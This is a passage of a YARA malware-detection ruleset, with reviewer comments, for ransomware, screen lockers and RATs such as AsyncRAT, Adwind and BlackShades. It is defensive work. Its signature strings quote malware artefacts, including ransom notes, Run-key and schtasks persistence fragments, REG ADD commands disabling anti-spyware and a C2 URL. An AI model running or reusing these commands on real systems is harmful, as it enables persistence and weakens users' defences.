        md5 = "a393b9536a1caa34914636d3da7378b5"
        md5 = "dbf3707a9cd090853a11dda9cfa78ff0"
        md5 = "dd5686ca7ec28815c3cf3ed3dbebdff2"
        md5 = "6337f0938e4a9c0ef44ab99deb0ef466"
    condition:
        // 0x122 = IMAGE_FILE_EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | 32BIT_MACHINE
        pe.characteristics == 0x122
        and pe.number_of_sections == 5
        and pe.imports("VERSION.dll", "VerQueryValueW")
        and uint8(pe.sections[4].raw_data_offset + pe.sections[4].raw_data_size) == 0x0d
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// TeslaCrypt. The single hex string decodes to "Now it's %I:%M%p." + 3 NUL bytes
// + "val is %d\n" + 2 NUL bytes. NOTE(review): that is a plain printf template
// with no ransomware-specific content and there is no PE/size anchor, so expect
// false positives on unrelated binaries that happen to carry the same strings.
// The description mentions an md5 but none is recorded in meta.
rule TeslaCrypt
{
    meta:
        description = "Regla para detectar Tesla con md5"
        author = "CCN-CERT"
        version = "1.0"
    strings:
        $ = { 4E 6F 77 20 69 74 27 73 20 25 49 3A 25 4D 25 70 2E 00 00 00 76 61 6C 20 69 73 20 25 64 0A 00 00 }
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// Tox ransomware, auto-generated with YaraGenerator. The three strings are
// repetitive byte runs rather than meaningful text and only two are required;
// $string2 is just six bytes (">>><<<"), so $string1 + $string2 alone can fire.
// meta says sample_filetype "exe" but the condition has no MZ check, so the rule
// also runs on memory; treat hits as low-confidence and pivot to the hashes.
rule Win32Toxic : tox ransomware
{
    meta:
        author = "@GelosSnake"
        date = "2015-06-02"
        description = "https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us"
        hash0 = "70624c13be4d8a4c1361be38b49cb3eb"
        hash1 = "4f20d25cd3ae2e5c63d451d095d97046"
        hash2 = "e0473434cc83b57c4b579d585d4c4c57"
        hash3 = "c52090d184b63e5cc71b524153bb079e"
        hash4 = "7ac0b49baba9914b234cde62058c96a5"
        hash5 = "048c007de4902b6f4731fde45fa8e6a9"
        hash6 = "238ef3e35b14e304c87b9c62f18953a9"
        hash7 = "8908ccd681f66429c578a889e6e708e1"
        hash8 = "de9fe2b7d9463982cc77c78ee51e4d51"
        hash9 = "37add8d26a35a3dc9700b92b67625fa4"
        hash10 = "a0f30e89a3431fca1d389f90dba1d56e"
        hash11 = "d4d0658302c731003bf0683127618bd9"
        hash12 = "d1d89e1c7066f41c1d30985ac7b569db"
        hash13 = "97d52d7281dfae8ff9e704bf30ce2484"
        hash14 = "2cc85be01e86e0505697cf61219e66da"
        hash15 = "02ecfb44b9b11b846ea8233d524ecda3"
        hash16 = "703a6ebe71131671df6bc92086c9a641"
        hash17 = "df23629b4a4aed05d6a453280256c05a"
        hash18 = "07466ff2572f16c63e1fee206b081d11"
        hash19 = "792a1c0971775d32bad374b288792468"
        hash20 = "fb7fd5623fa6b7791a221fad463223cd"
        hash21 = "83a562aab1d66e5d170f091b2ae6a213"
        hash22 = "99214c8c9ff4653b533dc1b19a21d389"
        hash23 = "a92aec198eee23a3a9a145e64d0250ee"
        hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e"
        hash25 = "f520fc947a6d5edb87aa01510bee9c8d"
        hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4"
        hash27 = "3133c2231fcee5d6b0b4c988a5201da1"
        hash28 = "e5b1d198edc413376e0c0091566198e4"
        hash29 = "50515b5a6e717976823895465d5dc684"
        hash30 = "510389e8c7f22f2076fc7c5388e01220"
        hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019"
        hash32 = "394187056697463eba97382018dfe151"
        hash33 = "045a5d3c95e28629927c72cf3313f4cd"
        hash34 = "70951624eb06f7db0dcab5fc33f49127"
        hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4"
        hash36 = "35a42fb1c65ebd7d763db4abb26d33b0"
        hash37 = "b0030f5072864572f8e6ba9b295615fc"
        hash38 = "62706f48689f1ba3d1d79780010b8739"
        hash39 = "be86183fa029629ee9c07310cd630871"
        hash40 = "9755c3920d3a38eb1b5b7edbce6d4914"
        hash41 = "cb42611b4bed97d152721e8db5abd860"
        hash42 = "5475344d69fc6778e12dc1cbba23b382"
        hash43 = "8c1bf70742b62dec1b350a4e5046c7b6"
        hash44 = "6a6541c0f63f45eff725dec951ec90a7"
        hash45 = "a592c5bee0d81ee127cbfbcb4178afe8"
        hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3"
        hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e"
        hash48 = "fc859ae67dc1596ac3fdd79b2ed02910"
        hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb"
        hash50 = "888dd1acce29cd37f0696a0284ab740a"
        hash51 = "0e3e231c255a5eefefd20d70c247d5f0"
        hash52 = "e5ebe35d934106f9f4cebbd84e04534b"
        hash53 = "3b580f1fa0c961a83920ce32b4e4e86d"
        hash54 = "d807a704f78121250227793ea15aa9c4"
        hash55 = "db462159bddc0953444afd7b0d57e783"
        hash56 = "2ed4945fb9e6202c10fad0761723cb0e"
        hash57 = "51183ab4fd2304a278e36d36b5fb990c"
        hash58 = "65d602313c585c8712ea0560a655ddeb"
        hash59 = "0128c12d4a72d14bb67e459b3700a373"
        hash60 = "5d3dfc161c983f8e820e59c370f65581"
        hash61 = "d4dd475179cd9f6180d5b931e8740ed6"
        hash62 = "5dd3782ce5f94686448326ddbbac934c"
        hash63 = "c85c6171a7ff05d66d497ad0d73a51ed"
        hash64 = "b42dda2100da688243fe85a819d61e2e"
        hash65 = "a5cf8f2b7d97d86f4d8948360f3db714"
        hash66 = "293cae15e4db1217ea72581836a6642c"
        hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58"
        hash68 = "c86dc1d0378cc0b579a11d873ac944e7"
        hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c"
        hash70 = "eb2eff9838043b67e8024ccadcfe1a8f"
        hash71 = "78778fe62ee28ef949eec2e7e5961ca8"
        hash72 = "e75c5762471a490d49b79d01da745498"
        hash73 = "1564d3e27b90a166a0989a61dc3bd646"
        hash74 = "59ba111403842c1f260f886d69e8757d"
        hash75 = "d840dfbe52a04665e40807c9d960cccc"
        hash76 = "77f543f4a8f54ecf84b15da8e928d3f9"
        hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8"
        hash78 = "202f042d02be4f6469ed6f2e71f42c04"
        hash79 = "28f827673833175dd9094002f2f9b780"
        hash80 = "0ff10287b4c50e0d11ab998a28529415"
        hash81 = "644daa2b294c5583ce6aa8bc68f1d21f"
        hash82 = "1c9db47778a41775bbcb70256cc1a035"
        hash83 = "c203bc5752e5319b81cf1ca970c3ca96"
        hash84 = "656f2571e4f5172182fc970a5b21c0e7"
        hash85 = "c17122a9864e3bbf622285c4d5503282"
        hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb"
        hash87 = "291ff8b46d417691a83c73a9d3a30cc9"
        hash88 = "1217877d3f7824165bb28281ccc80182"
        hash89 = "18419d775652f47a657c5400d4aef4a3"
        hash90 = "04417923bf4f2be48dd567dfd33684e2"
        hash91 = "31efe902ec6a5ab9e6876cfe715d7c84"
        hash92 = "a2e4472c5097d7433b91d65579711664"
        hash93 = "98854d7aba1874c39636ff3b703a1ed1"
        hash94 = "5149f0e0a56b33e7bbed1457aab8763f"
        hash95 = "7a4338193ce12529d6ae5cfcbb1019af"
        hash96 = "aa7f37206aba3cbe5e11d336424c549a"
        hash97 = "51cad5d45cdbc2940a66d044d5a8dabf"
        hash98 = "85edb7b8dee5b60e3ce32e1286207faa"
        hash99 = "34ca5292ae56fea78ba14abe8fe11f06"
        hash100 = "154187f07621a9213d77a18c0758960f"
        hash101 = "4e633f0478b993551db22afddfa22262"
        hash102 = "5c50e4427fe178566cada96b2afbc2d4"
        hash103 = "263001ac21ef78c31f4ca7ad2e7f191d"
        hash104 = "53fd9e7500e3522065a2dabb932d9dc5"
        hash105 = "48043dc55718eb9e5b134dac93ebb5f6"
        hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6"
        hash107 = "41b5403a5443a3a84f0007131173c126"
        hash108 = "6f3833bc6e5940155aa804e58500da81"
        hash109 = "9bd50fcfa7ca6e171516101673c4e795"
        hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7"
        hash111 = "c52afb663ff4165e407f53a82e34e1d5"
        hash112 = "5a16396d418355731c6d7bb7b21e05f7"
        hash113 = "05559db924e71cccee87d21b968d0930"
        hash114 = "824312bf8e8e7714616ba62997467fa8"
        hash115 = "dfec435e6264a0bfe47fc5239631903c"
        hash116 = "3512e7da9d66ca62be3418bead2fb091"
        hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc"
        hash118 = "d512da73d0ca103df3c9e7c074babc99"
        hash119 = "c622b844388c16278d1bc768dcfbbeab"
        hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58"
        hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9"
        hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce"
        hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc"
        hash124 = "66594a62d8c98e1387ec8deb3fe39431"
        hash125 = "a1add9e5d7646584fd4140528d02e4c3"
        hash126 = "11328bbf5a76535e53ab35315321f904"
        hash127 = "048f19d79c953e523675e96fb6e417a9"
        hash128 = "eb65fc2922eafd62defd978a3215814b"
        hash129 = "51cc9987f86a76d75bf335a8864ec250"
        hash130 = "a7f91301712b5a3cc8c3ab9c119530ce"
        hash131 = "de976a5b3d603161a737e7b947fdbb9a"
        hash132 = "288a3659cc1aec47530752b3a31c232b"
        hash133 = "91da679f417040558059ccd5b1063688"
        hash134 = "4ce9a0877b5c6f439f3e90f52eb85398"
        hash135 = "1f9e097ff9724d4384c09748a71ef99d"
        hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6"
        hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd"
        hash138 = "52c9d25179bf010a4bb20d5b5b4e0615"
        hash139 = "4b9995578d51fb891040a7f159613a99"
        sample_filetype = "exe"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
    strings:
        $string0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<"
        $string1 = "t;<<t;<<t<<<t<<"
        $string2 = ">>><<<"
    condition:
        2 of them
}

// Acroware screen locker (.NET debug build, per the obj\Debug PDB path).
// All strings required. NOTE(review): $s4 contains "SoftwareE" rather than
// "Software"; this may be a verbatim copy of a typo in the sample, so it is
// left untouched — confirm against the sample before "correcting" it.
rule screenlocker_acroware
{
    meta:
        description = "Rule to detect Acroware ScreenLocker"
        author = "Marc Rivero | @seifreed"
        reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
    strings:
        $s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii
        $s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii
        $s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii
        $s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
        $s5 = "webserver, after 72 hours the decryption key will get removed and your personal" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 2000KB ) and all of them
}

// Jeff DEV "ransomware" (screen locker with audio). Build paths and two
// on-screen messages; all required.
rule jeff_dev_ransomware
{
    meta:
        description = "Rule to detect Jeff DEV Ransomware"
        author = "Marc Rivero | @seifreed"
        reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
    strings:
        $s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide
        $s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii
        $s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide
        $s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 5000KB ) and all of them
}

// Locdoor/DryCry: a batch-style locker that copies itself and a VBS into the
// all-users StartUp folder and speaks the ransom note via SAPI. All strings
// required ($s6 was never defined in the published rule; numbering kept).
rule locdoor_ransomware
{
    meta:
        description = "Rule to detect Locdoor/DryCry"
        author = "Marc Rivero | @seifreed"
        reference = "https://twitter.com/leotpsc/status/1036180615744376832"
    strings:
        $s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii
        $s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii
        $s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii
        $s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii
        $s5 = "! Your computer's important files have been encrypted! " fullword ascii
        $s7 = "This program is not supported on your operating system." fullword ascii
        $s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii
        $s9 = "Please enter the password." fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 600KB ) and all of them
}

// 5h311_1nj3c706 screen locker (.NET). PDB path, the REG ADD commands it runs
// (wallpaper lock, DisableAntiSpyware) and the ransom text; all required.
rule screenlocker_5h311_1nj3c706
{
    meta:
        description = "Rule to detect the screenlocker 5h311_1nj3c706"
        author = "Marc Rivero | @seifreed"
        reference = "https://twitter.com/demonslay335/status/1038060120461266944"
    strings:
        $s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii
        $s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
        $s3 = "C:\\Users\\file1.txt" fullword wide
        $s4 = "C:\\Users\\file2.txt" fullword wide
        $s5 = "C:\\Users\\file.txt" fullword wide
        $s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide
        $s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide
        $s8 = "All your file has been locked. You must pay money to have a key." fullword wide
        $s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 200KB ) and all of them
}

// Shrug2 (.NET). PDB path, C2 host and decryptor shortcut names; all required,
// which is what keeps the generic $s5/$s6 from mattering on their own.
rule shrug2_ransomware
{
    meta:
        description = "Rule to detect Shrug2 ransomware"
        author = "Marc Rivero | @seifreed"
        reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
    strings:
        $s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii
        $s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide
        $s4 = "Shortcut for @ShrugDecryptor@.exe" fullword wide
        $s5 = "C:\\Users\\" fullword wide
        $s6 = "http://clients3.google.com/generate_204" fullword wide
        $s7 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide
    condition:
        ( uint16(0) == 0x5a4d and filesize < 2000KB ) and all of them
}

// Termite: Run-key persistence paths, drop location, contact address and a
// file-dialog filter; all required.
rule termite_ransomware
{
    meta:
        description = "Rule to detect Termite Ransomware"
        author = "Marc Rivero | @seifreed"
        reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
    strings:
        $s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii
        $s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii
        $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii
        $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii
        $s5 = "C:\\Windows\\Termite.exe" fullword ascii
        $s6 = "\\Shell\\Open\\Command\\" fullword ascii
        $s7 = "t314.520@qq.com" fullword ascii
        $s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
    condition:
        ( uint16(0) == 0x5a4d and filesize < 6000KB ) and all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Adwind JAR packer "A": ZIP magic (PK) plus the obfuscated package layout.
// ".class" and the manifest path are present in every JAR; the short package
// names "c/a/a/" and "b/a/" and "a.dat" are what carry the detection.
rule Adwind_JAR_PACKA : binary RAT Frutas Unrecom AlienSpy
{
    meta:
        author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
        reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
        last_modified = "2015-11-30"
    strings:
        $b1 = ".class" ascii
        $b2 = "c/a/a/" ascii
        $b3 = "b/a/" ascii
        $b4 = "a.dat" ascii
        $b5 = "META-INF/MANIFEST.MF" ascii
    condition:
        int16(0) == 0x4B50 and ($b1 and $b2 and $b3 and $b4 and $b5)
}

// Adwind JAR packer "B": ZIP magic, manifest and main/Start.class plus one of
// two embedded resource paths.
// NOTE(review): $a1 reads "con g/con g.perl", which looks like a PDF copy of
// "config/config.perl" with the "fi" ligature dropped; as written it is unlikely
// to match a real archive, leaving $b1 as the only effective alternative. Verify
// against the Kaspersky report / samples before changing the literal.
rule Adwind_JAR_PACKB : binary RAT Frutas Unrecom AlienSpy
{
    meta:
        author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com"
        reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf"
        last_modified = "2015-11-30"
    strings:
        $c1 = "META-INF/MANIFEST.MF" ascii
        $c2 = "main/Start.class" ascii
        $a1 = "con g/con g.perl" ascii
        $b1 = "java/textito.isn" ascii
    condition:
        int16(0) == 0x4B50 and ($c1 and $c2 and ($a1 or $b1))
}

// AlienSpy JAR: three alternative file-name sets, each taken from ZIP central
// directory entries (hence the "PK" suffix on the class names). Within a set
// every entry is required. NOTE(review): $sc_8 = "PK" is a 2-byte string and
// several $sc_* entries ("options", "plugins", "util") are generic — they are
// harmless only because "AlienSpy" and "util/OSHelper" are required alongside.
rule crime_win_rat_AlienSpy : binary RAT Frutas Unrecom AlienSpy
{
    meta:
        description = "Alien Spy Remote Access Trojan"
        author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team"
        reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf"
        reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv"
        date = "2015-04-04"
        filetype = "Java"
        hash_1 = "075fa0567d3415fbab3514b8aa64cfcb"
        hash_2 = "818afea3040a887f191ee9d0579ac6ed"
        hash_3 = "973de705f2f01e82c00db92eaa27912c"
        hash_4 = "7f838907f9cc8305544bd0ad4cfd278e"
        hash_5 = "071e12454731161d47a12a8c4b3adfea"
        hash_6 = "a7d50760d49faff3656903c1130fd20b"
        hash_7 = "f399afb901fcdf436a1b2a135da3ee39"
        hash_8 = "3698a3630f80a632c0c7c12e929184fb"
        hash_9 = "fdb674cadfa038ff9d931e376f89f1b6"
    strings:
        // Set A
        $sa_1 = "META-INF/MANIFEST.MF"
        $sa_2 = "Main.classPK"
        $sa_3 = "plugins/Server.classPK"
        $sa_4 = "IDPK"
        // Set B (encrypted-stub loader variant)
        $sb_1 = "config.iniPK"
        $sb_2 = "password.iniPK"
        $sb_3 = "plugins/Server.classPK"
        $sb_4 = "LoadStub.classPK"
        $sb_5 = "LoadStubDecrypted.classPK"
        $sb_7 = "LoadPassword.classPK"
        $sb_8 = "DecryptStub.classPK"
        $sb_9 = "ClassLoaders.classPK"
        // Set C
        $sc_1 = "config.xml"
        $sc_2 = "options"
        $sc_3 = "plugins"
        $sc_4 = "util"
        $sc_5 = "util/OSHelper"
        $sc_6 = "Start.class"
        $sc_7 = "AlienSpy"
        $sc_8 = "PK"
    condition:
        uint16(0) == 0x4B50 and filesize < 800KB
        and ( (all of ($sa_*)) or (all of ($sb_*)) or (all of ($sc_*)) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Adzok RAT (Java). Seven of eight archive entry names; no ZIP magic check, so
// it also works on an archive that is not at offset 0 of the scanned buffer.
rule Adzok : binary RAT Adzok
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        Description = "Adzok Rat"
        Versions = "Free 1.0.0.3,"
        date = "2015/05"
        ref = "http://malwareconfig.com/stats/Adzok"
        maltype = "Remote Access Trojan"
        filetype = "jar"
    strings:
        $a1 = "config.xmlPK"
        $a2 = "key.classPK"
        $a3 = "svd$1.classPK"
        $a4 = "svd$2.classPK"
        $a5 = "Mensaje.classPK"
        $a6 = "inic$ShutdownHook.class"
        $a7 = "Uninstall.jarPK"
        $a8 = "resources/icono.pngPK"
    condition:
        7 of ($a*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// AsyncRAT (.NET). Requires all four sandbox/VM check strings, four of the six
// config keys, and then either the embedded XMRig argument or three of the
// behavioural strings (reversed Run key, MessagePack error text, schtasks
// persistence). Everything is UTF-16 (wide) as expected for a .NET binary.
rule win_asyncrat_j1
{
    meta:
        author = "Johannes Bader @viql"
        date = "2020-04-26"
        description = "detects AsyncRAT"
        references = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
        tlp = "white"
    strings:
        // Anti-analysis checks (all required).
        $str_anti_1 = "VIRTUAL" wide
        $str_anti_2 = "vmware" wide
        $str_anti_3 = "VirtualBox" wide
        $str_anti_4 = "SbieDll.dll" wide
        // XMRig command-line flag carried by the miner plugin.
        $str_miner_1 = "--donate-level=" wide
        // "Software\Microsoft\Windows\CurrentVersion\Run\" stored reversed.
        $str_b_rev_run = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
        // MessagePack library error messages.
        $str_b_msg_pack_1 = "(ext8,ext16,ex32) type $c7,$c8,$c9" wide
        $str_b_msg_pack_2 = "(never used) type $c1" wide
        // schtasks persistence fragments.
        $str_b_schtask_1 = "/create /f /sc ONLOGON /RL HIGHEST /tn \"'" wide
        $str_b_schtask_2 = "\"' /tr \"'" wide
        // Config / protocol keywords (4 of 6).
        $str_config_1 = "Antivirus" wide
        $str_config_2 = "Pastebin" wide
        $str_config_3 = "HWID" wide
        $str_config_4 = "Installed" wide
        $str_config_5 = "Pong" wide
        $str_config_6 = "Performance" wide
    condition:
        all of ($str_anti_*)
        and 4 of ($str_config_*)
        and ( all of ($str_miner_*) or 3 of ($str_b_*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// BlackShades (VB6). Module and timer names from the client source. Each name
// is written as a regex with its first letter in a group, presumably so the
// rule text itself does not contain the literal and cannot self-match when the
// rule file is present in scanned memory. Ten of either family is enough.
rule BlackShades_3 : Trojan RAT
{
    meta:
        description = "BlackShades RAT"
        author = "botherder https://github.com/botherder"
    strings:
        $mod1 = /(m)odAPI/
        $mod2 = /(m)odAudio/
        $mod3 = /(m)odBtKiller/
        $mod4 = /(m)odCrypt/
        $mod5 = /(m)odFuctions/
        $mod6 = /(m)odHijack/
        $mod7 = /(m)odICallBack/
        $mod8 = /(m)odIInet/
        $mod9 = /(m)odInfect/
        $mod10 = /(m)odInjPE/
        $mod11 = /(m)odLaunchWeb/
        $mod12 = /(m)odOS/
        $mod13 = /(m)odPWs/
        $mod14 = /(m)odRegistry/
        $mod15 = /(m)odScreencap/
        $mod16 = /(m)odSniff/
        $mod17 = /(m)odSocketMaster/
        $mod18 = /(m)odSpread/
        $mod19 = /(m)odSqueezer/
        $mod20 = /(m)odSS/
        $mod21 = /(m)odTorrentSeed/
        $tmr1 = /(t)mrAlarms/
        $tmr2 = /(t)mrAlive/
        $tmr3 = /(t)mrAnslut/
        $tmr4 = /(t)mrAudio/
        $tmr5 = /(t)mrBlink/
        $tmr6 = /(t)mrCheck/
        $tmr7 = /(t)mrCountdown/
        $tmr8 = /(t)mrCrazy/
        $tmr9 = /(t)mrDOS/
        $tmr10 = /(t)mrDoWork/
        $tmr11 = /(t)mrFocus/
        $tmr12 = /(t)mrGrabber/
        $tmr13 = /(t)mrInaktivitet/
        $tmr14 = /(t)mrInfoTO/
        $tmr15 = /(t)mrIntervalUpdate/
        $tmr16 = /(t)mrLiveLogger/
        $tmr17 = /(t)mrPersistant/
        $tmr18 = /(t)mrScreenshot/
        $tmr19 = /(t)mrSpara/
        $tmr20 = /(t)mrSprid/
        $tmr21 = /(t)mrTCP/
        $tmr22 = /(t)mrUDP/
        $tmr23 = /(t)mrWebHide/
    condition:
        10 of ($mod*) or 10 of ($tmr*)
}

// BlackShades server. Hex decodes to "bss_server", "CLICK_DELAY\0SCK_ID" and
// "modInjPE"; all three required.
// NOTE(review): rule `BlackShades` later in this file is byte-for-byte the same
// signature under another name; every hit will be reported twice.
rule BlackShades2 : Trojan RAT
{
    meta:
        author = "Kevin Falcoz"
        date = "26/06/2013"
        description = "BlackShades Server"
    strings:
        $signature1 = { 62 73 73 5F 73 65 72 76 65 72 }
        $signature2 = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
        $signature3 = { 6D 6F 64 49 6E 6A 50 45 }
    condition:
        $signature1 and $signature2 and $signature3
}

// BlackShades, memory-oriented. $a is "Blackshades" in UTF-16LE (without the
// final NUL of the last character), $c/$d/$e are the same three markers as
// BlackShades2, $b is an opaque wide blob (meaning not documented), and $apikey
// is a 64-hex-character token. Any single string fires the rule.
rule BlackShades_4 : rat
{
    meta:
        description = "BlackShades"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"
    strings:
        $a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
        $b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
        $c = { 62 73 73 5F 73 65 72 76 65 72 }
        $d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
        $e = { 6D 6F 64 49 6E 6A 50 45 }
        $apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
    condition:
        any of ($a, $b, $c, $d, $e) or $apikey
}

// Duplicate of BlackShades2 (identical strings and condition), kept for
// compatibility with consumers that key on this rule name.
rule BlackShades : Trojan
{
    meta:
        author = "Kevin Falcoz"
        date = "26/06/2013"
        description = "BlackShades Server"
    strings:
        $signature1 = { 62 73 73 5F 73 65 72 76 65 72 }
        $signature2 = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
        $signature3 = { 6D 6F 64 49 6E 6A 50 45 }
    condition:
        $signature1 and $signature2 and $signature3
}

// BlackShades: server marker, chat control name and the UDP flood feature name;
// all required. NOTE(review): the first `ref` points at the PoisonIvy stats page
// while `family` is blackshades — looks like a copy-paste from another rule.
rule BlackShades_25052015
{
    meta:
        author = "Brian Wallace (@botnet_hunter)"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/PoisonIvy"
        ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
        family = "blackshades"
    strings:
        $string1 = "bss_server"
        $string2 = "txtChat"
        $string3 = "UDPFlood"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
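*/
import "pe"

// "Bolonyokte" .NET RAT: campaign names, decoy document names, dropped
// artifacts, capability names and e-banking lure strings.
rule Bolonyokte : rat
{
    meta:
        description = "UnknownDotNet RAT - Bolonyokte"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-02-01"
        filetype = "memory"
        version = "1.0"

    strings:
        $campaign1 = "Bolonyokte" ascii wide
        $campaign2 = "donadoni" ascii wide

        $decoy1 = "nyse.com" ascii wide
        $decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
        $decoy3 = "bf13-5d45cb40" ascii wide

        // $artifact4-6 are common file names; the "2 of" threshold below
        // means two of them alone will fire — a known false-positive source.
        $artifact1 = "Backup.zip" ascii wide
        $artifact2 = "updates.txt" ascii wide
        $artifact3 = "vdirs.dat" ascii wide
        $artifact4 = "default.dat"
        $artifact5 = "index.html"
        $artifact6 = "mime.dat"

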